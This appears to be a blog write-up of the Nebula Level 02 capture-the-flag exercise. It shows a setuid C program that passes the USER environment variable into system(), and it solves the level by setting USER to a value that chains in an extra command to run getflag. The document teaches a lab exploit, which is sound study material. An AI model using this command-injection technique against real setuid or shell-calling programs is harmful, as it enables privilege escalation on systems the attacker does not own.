Nebula Level 02

Level 02 instructions

About
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.
include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
}


This looks like another simple C program that I need to trick. It looks like on line 22 a bash command is constructed using the USER environmental variable. Then on line 25 that command is executed. Since I can control the USER environmental variable I should be able to control the command.
In bash you can chain commands together using &&. So I set my user variable to chain a couple of commands together.

export USER='&& /bin/getflag &&'

Now when the program is running it should construct a command that looks like this

/bin/echo && /bin/getflag && is cool

When this is executed it should first run “/bin/echo” with no parameters, next run “/bin/getflag”, and finally try to run “is cool” which will just fail since it’s not a valid command. Because this program uses the setuid flag this will all run as the flag02 user.

/home/flag02/flag02 
about to call system("/bin/echo && /bin/getflag && is cool")

You have successfully executed getflag on a target account

Leave a Reply

Your email address will not be published. Required fields are marked *